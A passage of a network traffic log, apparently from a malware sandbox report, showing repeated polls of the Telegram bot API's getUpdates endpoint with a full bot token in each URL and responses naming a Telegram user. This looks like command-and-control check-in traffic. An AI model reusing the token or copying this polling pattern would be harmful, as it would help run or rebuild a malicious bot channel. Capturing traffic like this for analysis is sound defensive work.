                                                                                        67192.168.2.449828149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:59 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:59 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:59 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:59 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        68192.168.2.449829149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:00 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:01 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:01 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:01 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        69192.168.2.449830149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:01 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:01 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:01 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:01 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        70192.168.2.449831149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:03 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:03 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:03 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:03 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        71192.168.2.449832149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:03 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:03 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:03 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:03 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        72192.168.2.449833149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:05 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:05 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:05 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:05 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        73192.168.2.449834149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:05 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:06 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:05 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:06 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        74192.168.2.449835149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:07 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:07 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:07 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        75192.168.2.449836149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:07 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:08 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:08 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        76192.168.2.449837149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:09 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:09 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:09 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:09 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        77192.168.2.449838149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:09 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:10 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:10 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:10 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        78192.168.2.449839149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:11 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:11 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:11 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:11 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        79192.168.2.449840149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:12 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:12 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:12 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
